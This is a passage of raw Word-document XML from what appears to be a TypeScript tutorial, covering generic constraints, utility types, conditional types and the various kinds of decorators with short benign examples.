          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4. Generic Constraints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3CC967"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You can constrain the types that can be used with a generic by specifying constraints. This ensures that the type parameter meets certain requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5307451D"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example: Generic Constraint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307D1A27"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Lengthwise {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A611D90"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length: number;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB7FD86"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F85B9D9"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p>
    <w:p w14:paraId="58378E33"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logLength&lt;T extends Lengthwise&gt;(value: T): void {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66572898"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console.log(value.length);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BD48E7"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0A29F28"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p>
    <w:p w14:paraId="09C0A830"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logLength("hello"); // Logs: 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F00E712"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logLength([1, 2, 3]); // Logs: 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AD68C5"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lastRenderedPageBreak/>
        <w:t>Here:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37990F21" w14:textId="77777777" w:rsidR="003F1308" w:rsidRPr="00DA2F32" w:rsidRDefault="003F1308" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="291"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>T extends Lengthwise constrains T to types that have a length property.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E63C5C" w14:textId="77777777" w:rsidR="003F1308" w:rsidRPr="00DA2F32" w:rsidRDefault="003F1308" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5. Using Multiple Type Parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA640F4"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Generics can have multiple type parameters to handle more complex scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4116BEEF"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example: Multiple Type Parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C912F5C"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merge&lt;T, U&gt;(first: T, second: U): T &amp; U {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D2A5DB"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 ...first, ...second };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14317656"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895886D"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B9F8681"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result = merge({ name: "Alice" }, { age: 30 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F7D297" w14:textId="77777777" w:rsidR="003F1308" w:rsidRPr="00DA2F32" w:rsidRDefault="003F13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result has type { name: string; age: number }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B56A886"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In this example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068BE2F7" w14:textId="77777777" w:rsidR="003F1308" w:rsidRPr="00DA2F32" w:rsidRDefault="003F1308" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="292"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>merge takes two parameters of different types and returns an object that combines both types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8EDFBE" w14:textId="77777777" w:rsidR="003F1308" w:rsidRPr="00DA2F32" w:rsidRDefault="003F1308" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>6. Generic Utility Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672A56D6"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TypeScript provides several built-in generic utility types that help with common type transformations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E522F46"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EC80FA" w14:textId="77777777" w:rsidR="003F1308" w:rsidRPr="00DA2F32" w:rsidRDefault="003F1308" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="293"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Partial</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Makes all properties of a type optional.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D032463"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Person {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C97BCD7"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0434338A"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age: number;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A9E7C8"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E2DDBC4"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p>
    <w:p w14:paraId="5054CE8F"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partialPerson: Partial&lt;Person&gt; = { name: "Bob" }; // age is optional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6085346A" w14:textId="77777777" w:rsidR="003F1308" w:rsidRPr="00DA2F32" w:rsidRDefault="003F1308" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="293"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Readonly</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Makes all properties of a type read-only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21913DDC"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readonlyPerson: Readonly&lt;Person&gt; = { name: "Alice", age: 30 };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFED7EB"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readonlyPerson.age = 31; // Error: Cannot assign to 'age' because it is a read-only property</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAE38A6" w14:textId="77777777" w:rsidR="003F1308" w:rsidRPr="00DA2F32" w:rsidRDefault="003F1308" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="293"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Record</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Constructs an object type with specific properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1C4A50"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PageInfo = "home" | "about" | "contact";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5BC80A"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pages: Record&lt;PageInfo, string&gt; = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E15ED77"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home: "Home Page",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A43D328"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about: "About Us",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77089924"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contact: "Contact Us"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE804B3"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308FC01" w14:textId="77777777" w:rsidR="003F1308" w:rsidRPr="00DA2F32" w:rsidRDefault="003F1308" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7. Conditional Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB875F3"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Conditional types provide a way to create types based on a condition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0191BEFA" w14:textId="77777777" w:rsidR="003F1308" w:rsidRPr="00DA2F32" w:rsidRDefault="003F1308" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example: Conditional Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114DE007"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IsString&lt;T&gt; = T extends string ? "Yes" : "No";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73981E25"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p>
    <w:p w14:paraId="2DC954B9"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Test1 = IsString&lt;string&gt;; // "Yes"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC40A9C" w14:textId="77777777" w:rsidR="003F1308" w:rsidRPr="00DA2F32" w:rsidRDefault="003F130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type Test2 = IsString&lt;number&gt;; // "No"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180AEF2E" w14:textId="77777777" w:rsidR="0002063F" w:rsidRPr="00DA2F32" w:rsidRDefault="0002063F" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08040BB8" w14:textId="76867380" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="105" w:name="_Toc178383288"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What are decorators in TypeScript</w:t>
      </w:r>
      <w:bookmarkEnd w:id="105"/>
    </w:p>
    <w:p w14:paraId="7ED033C4"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Decorators in TypeScript are a special kind of declaration that can be attached to classes, methods, accessor properties, and parameters to modify their behavior or add metadata. Decorators provide a way to add metadata to classes and their members, making them particularly useful for frameworks and libraries that rely on reflection or aspect-oriented programming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145EE7C2" w14:textId="77777777" w:rsidR="003F7A48" w:rsidRPr="00DA2F32" w:rsidRDefault="003F7A48" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Basics of Decorators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EDB334"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1. Enabling Decorators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15008E70"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>To use decorators in TypeScript, you need to enable them in your tsconfig.json file. Specifically, set the experimentalDecorators option to true.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AED2EF9"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82FCE17"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"compilerOptions": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0214B4"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"experimentalDecorators": true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E1411E"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"emitDecoratorMetadata": true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738BDBF6"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78251D2"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D89BD08" w14:textId="77777777" w:rsidR="003F7A48" w:rsidRPr="00DA2F32" w:rsidRDefault="003F7A48" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="294"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>experimentalDecorators: Allows the use of decorators.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6825AA47" w14:textId="77777777" w:rsidR="003F7A48" w:rsidRPr="00DA2F32" w:rsidRDefault="003F7A48" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="294"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>emitDecoratorMetadata: Emits design-type metadata which is required for some decorators.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080265D9" w14:textId="77777777" w:rsidR="003F7A48" w:rsidRPr="00DA2F32" w:rsidRDefault="003F7A48" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Types of Decorators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F09F991"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1. Class Decorators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB8114F"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Class decorators are applied to the class constructor and can be used to modify or replace the class definition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7CD12C"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223FADD7"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LogClass(target: Function) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFCE279"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console.log(`Class ${target.name} has been created.`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23894634"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456F14F"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p>
    <w:p w14:paraId="76745B48"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@LogClass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DED576"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Person {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AFF6E5"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constructor(public name: string) {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449F7FAA"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5F179BF"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p>
    <w:p w14:paraId="0BD857D3"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person = new Person('Alice'); // Logs: Class Person has been created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05ADFF6A"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lastRenderedPageBreak/>
        <w:t>2. Method Decorators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2C3D1A"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Method decorators are applied to methods of a class and can be used to modify method behavior or add metadata.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F31061B"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56B0E79E"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LogMethod(target: any, propertyKey: string, descriptor: PropertyDescriptor) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB2765B"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originalMethod = descriptor.value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687378B8"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0EB07C2"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descriptor.value = function(...args: any[]) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439559F2"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console.log(`Method ${propertyKey} was called with args: ${args}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A862CB"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originalMethod.apply(this, args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE2E354"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43808B4"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4B2862D"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p>
    <w:p w14:paraId="7FD273AA"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Calculator {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AC42C2"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@LogMethod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3689EC03"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add(a: number, b: number): number {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642FF944"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a + b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7A9F2A"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E38D298"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4F3DDDF"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p>
    <w:p w14:paraId="3A9386E2"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calculator = new Calculator();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AA61E5"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calculator.add(5, 10); // Logs: Method add was called with args: 5,10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7A6735"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3. Accessor Decorators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D62E00"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Accessor decorators are applied to getters and setters of a class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AF965D"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431F4FFB"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LogAccessor(target: any, propertyKey: string, descriptor: PropertyDescriptor) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234C1B7D"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originalGet = descriptor.get;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C752F1"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originalSet = descriptor.set;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC5BACC"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p>
    <w:p w14:paraId="729BF661"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descriptor.get = function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6447D202"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console.log(`Getter for ${propertyKey} called`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325090C9"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originalGet?.apply(this);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CF44BD"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58CD8B5"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p>
    <w:p w14:paraId="47626D9F"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descriptor.set = function(value: any) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26144CBF"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console.log(`Setter for ${propertyKey} called with value ${value}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D10902"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originalSet?.apply(this, [value]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355398D3"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31A9D4F" w14:textId="77777777" w:rsidR="003F7A48" w:rsidRPr="00DA2F32" w:rsidRDefault="003F7A48"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F11C48E"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7AE41CB"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User {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331EEA27"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private _name: string = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4409B91A"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40EF99B"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@LogAccessor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8A7D03"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get name(): string {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EA9D6E"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this._name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A6476D"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10ED87F"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19446F3"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@LogAccessor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30727E58"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set name(value: string) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3365B3F0"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this._name = value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB4C57B"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508E639"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174F578"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EF9D17C"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user = new User();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E67A89"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user.name = 'Alice'; // Logs: Setter for name called with value Alice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F7903F"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console.log(user.name); // Logs: Getter for name called</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48657663"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4. Parameter Decorators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777B8D77"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Parameter decorators are applied to the parameters of a method or constructor and are used to add metadata to parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EEFA20"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76D354D1"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LogParameter(target: any, propertyKey: string, parameterIndex: number) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2469C353"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existingParameters: number[] = Reflect.getOwnMetadata('log_parameters', target, propertyKey) || [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08770220"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existingParameters.push(parameterIndex);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5899373A"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Reflect.defineMetadata('log_parameters', existingParameters, target, propertyKey);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E88F5B"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CD03D05"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BC1D40A"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MessageService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F05AB4"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sendMessage(@LogParameter recipient: string, message: string) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D4616A"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console.log(`Sending message "${message}" to ${recipient}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA9F7ED"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998FF76"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D8D2CD5"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BFDAE7C"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service = new MessageService();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1BB359"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lastRenderedPageBreak/>
        <w:t>service.sendMessage('Alice', 'Hello!'); // Logs the message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BC312E"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5. Property Decorators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B76F01"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Property decorators are applied to the properties of a class and can be used to add metadata to properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2A432A"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1B12703A"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LogProperty(target: any, propertyKey: string) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D681F30"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console.log(`Property ${propertyKey} has been declared.`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E813E2C"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F3AC746"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CFB7F20"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Person {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3748DF65"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@LogProperty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AEE755"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string;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DED5FDA"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682FBFA"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constructor(name: string) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A095EC3"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this.name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048560D8"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BE0F791"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08638E3"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84133AE"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person = new Person('Alice'); // Logs: Property name has been declared.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0868848A" w14:textId="77777777" w:rsidR="003F7A48" w:rsidRPr="00DA2F32" w:rsidRDefault="003F7A48" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Using Reflect Metadata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB14BF2"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sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Decorators can work with metadata through the reflect-metadata library. This library provides reflection capabilities that decorators can use to add and retrieve metadata.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BB4407" w14:textId="77777777" w:rsidR="003F7A48" w:rsidRPr="00DA2F32" w:rsidRDefault="003F7A48"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332D9477" w14:textId="77777777" w:rsidR="003F7A48" w:rsidRPr="00DA2F32" w:rsidRDefault="003F7A48" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="295"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
